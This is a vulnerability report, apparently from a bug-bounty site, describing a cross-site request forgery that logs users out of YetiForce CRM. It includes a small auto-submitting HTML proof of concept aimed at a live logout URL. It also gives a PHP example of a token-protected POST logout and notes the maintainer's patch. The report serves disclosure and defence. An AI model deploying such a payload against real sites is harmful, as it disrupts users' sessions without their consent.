Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm
Valid
Reported on Dec 9th 2021
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://gitstable.yetiforce.com/index.php?module=Users&parent=Settings&action=Logout">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability lets an attacker force a logged-in user to log out without their intent.
More details
One way a GET logout can be abused is that anyone (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet; if a user of your site stumbles upon that page, they are logged out without knowing it. This is why logout should be a POST request protected by a CSRF token.
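To make the fix concrete, here is an added illustration (not YetiForce's own code) of the GET-based logout shape described above beside a hardened handler that only accepts a POST carrying a session-bound CSRF token. The function names and the plain `$session`/`$post` arrays are assumptions so the logic can be exercised from the command line without a web server; the endpoint path is the one from the proof of concept.

```php
<?php
// Added example, not code from the YetiForce project. Function names and the
// array-based session/request model are assumptions for a stand-alone demo.
declare(strict_types=1);

// --- Vulnerable shape (what the report describes) ---------------------------
// Any request that reaches the endpoint, including a cross-site GET from an
// <img src="..."> or an auto-submitted form, ends the session.
function logoutVulnerable(array &$session): bool
{
    $session = [];   // destroyed regardless of HTTP method or origin
    return true;
}

// --- Hardened shape -----------------------------------------------------------
// Issue (or reuse) a per-session anti-CSRF token: 32 random bytes, hex-encoded.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a logout request is legitimate.
// $method: HTTP method; $post: POST body; $session: server-side session data.
function isValidLogoutRequest(string $method, array $post, array $session): bool
{
    // 1. Safe methods must never change state. This also closes the <img>/GET-form
    //    vector, which SameSite=Lax cookies do not block (they are sent on
    //    top-level GET navigations).
    if ($method !== 'POST') {
        return false;
    }
    // 2. The token must be present on both sides.
    if (empty($session['csrf_token']) || empty($post['csrf_token'])
        || !is_string($post['csrf_token'])) {
        return false;
    }
    // 3. Constant-time comparison so a mismatch does not leak through timing.
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Returns true and clears the session only for a valid request; the caller is
// expected to answer 403 when false is returned.
function logoutHardened(string $method, array $post, array &$session): bool
{
    if (!isValidLogoutRequest($method, $post, $session)) {
        return false;
    }
    $session = [];
    return true;
}

// The logout control to render for a logged-in user: POST plus hidden token.
function renderLogoutForm(string $token): string
{
    $safe = htmlspecialchars($token, ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/index.php?module=Users&amp;parent=Settings&amp;action=Logout">'
         . '<input type="hidden" name="csrf_token" value="' . $safe . '">'
         . '<button type="submit">Log out</button></form>';
}

// --- Walk-through using the report's scenario (constructed session) ----------
function check(bool $ok, string $what): void
{
    if (!$ok) {
        fwrite(STDERR, "FAILED: $what\n");
        exit(1);
    }
}

$session = ['user_id' => 42];
$token   = csrfToken($session);

// The PoC page submits a GET with no token: rejected, user stays logged in.
check(!logoutHardened('GET', [], $session) && isset($session['user_id']), 'GET rejected');
// A cross-site POST cannot include the token (attacker cannot read it): rejected.
check(!logoutHardened('POST', [], $session) && isset($session['user_id']), 'POST without token rejected');
// A click on the rendered form carries the token: accepted, session cleared.
check(logoutHardened('POST', ['csrf_token' => $token], $session) && $session === [], 'valid logout');

echo renderLogoutForm($token), "\n";
echo "all checks passed\n";
```

The method check alone does not substitute for the token: a cross-site `<form method="post">` can still be auto-submitted exactly as in the proof of concept, so both controls are needed. Binding the token to the session (rather than a fixed site-wide value) is what keeps an attacker from learning it from their own account.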
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
Occurrences
We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours.
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md
a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Logout.php#L11-L49 has been validated
Mariusz Krzaczkowski commented a year ago
The patch is available in 6.2.0_SecurityFix_v2.zip https://github.com/YetiForceCompany/UpdatePackages/tree/master/YetiForce%20CRM%206.x.x/6.2.0_SecurityFix/zip